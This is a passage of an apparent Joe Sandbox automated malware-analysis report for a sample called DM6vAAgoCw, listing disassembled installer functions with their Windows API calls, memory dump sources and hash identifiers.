                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$AttributesCreate
                                                                                              • String ID:
                                                                                              • API String ID: 415043291-0
                                                                                              • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                              • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                              • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                              • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                              Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                              • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                              • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                              • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                              Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                              • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                              • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                              • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                              Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                              • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: Char$Next$CreateDirectoryPrev
                                                                                              • String ID:
                                                                                              • API String ID: 4115351271-0
                                                                                              • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                              • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                              • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                              • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                              Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                              • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                              • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                              • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                              Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePointer
                                                                                              • String ID:
                                                                                              • API String ID: 973152223-0
                                                                                              • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                              • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                              • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                              • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                              Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 3850602802-0
                                                                                              • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                              • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                              • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                              • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                              Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallbackDispatcherUser
                                                                                              • String ID:
                                                                                              • API String ID: 2492992576-0
                                                                                              • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                              • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                              • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                              • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

                                                                                              Non-executed Functions

                                                                                              Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                              • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                              • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                              • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                              • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                              • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                              • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                              • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                              • String ID: $ @$M$N
                                                                                              • API String ID: 1638840714-3479655940
                                                                                              • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                              • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                              • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                              • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                              Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                              • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                              • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                              • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                              • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                              • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                              • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                              Strings
                                                                                              • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                              • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                              • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                              • ptF, xrefs: 00406D1A
                                                                                              • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                              • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                              • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                              • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                              • \*.*, xrefs: 00406D2F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                              • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                              • API String ID: 2035342205-1650287579
                                                                                              • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                              • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                              • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                              • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                              Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                              • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                              • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                              • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                              • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                              • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                              • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                              • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                              • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004241C1,762323A0,00000000), ref: 00406902
                                                                                              • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118895843.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_DM6vAAgoCw.jbxd
                                                                                              Similarity
                                                                                              • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                              • String ID: F$A
                                                                                              • API String ID: 3347642858-1281894373
                                                                                              • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                              • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                              • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                              • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                              Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                              • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                              • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                              • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                              • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                              • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.2118789606.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.2118775307.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.2118819291.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
